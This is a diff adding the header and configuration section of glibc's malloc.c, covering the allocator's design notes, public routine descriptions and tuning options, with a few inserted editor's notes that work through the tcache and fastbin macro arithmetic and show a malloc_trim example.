+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+
+/* Maximum chunks in tcache bins for tunables.  This value must fit the range
+   of tcache->counts[] entries, else they may overflow.  */
+# define MAX_TCACHE_COUNT UINT16_MAX
+#endif
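+
+/* Editor's note (worked arithmetic, not part of glibc): with the usual 64-bit
+   constants (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 32) the macros
+   above expand to
+
+     csize2tidx (x)  = (x - 32 + 15) / 16
+     csize2tidx (32) = 0                    -- requests of 0..24 user bytes
+     csize2tidx (48) = 1                    -- requests of 25..40 user bytes
+     tidx2usize (63) = 63 * 16 + 32 - 8 = 1032
+
+   so MAX_TCACHE_SIZE covers up to 1032 bytes of user data (516 on 32-bit),
+   matching the bin table above.  */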
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG mallinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minimum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  If n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters.  The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not yet reused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
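+
+/* Editor's note: a minimal usage sketch (not part of glibc).  malloc_trim(0)
+   asks the allocator to hand back as much unused memory as possible and
+   reports whether anything was actually released.
+
+     #include <malloc.h>
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *p = malloc (1 << 20);
+       free (p);
+       // Returns 1 if memory was returned to the system, 0 otherwise.
+       printf ("trimmed: %d\n", malloc_trim (0));
+       return 0;
+     }
+*/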
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
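+
+/* Editor's note (worked arithmetic, not part of glibc): with SIZE_SZ = 4 on
+   32-bit builds DEFAULT_MXFAST is 64 * 4 / 4 = 64 bytes, and with SIZE_SZ = 8
+   on 64-bit builds it is 64 * 8 / 4 = 128 bytes, matching the defaults listed
+   in the option synopsis near the top of this file.  */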
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather than memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set it to
+  (unsigned long)(-1).
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb that was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system; by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmapped shared libraries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bit machines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
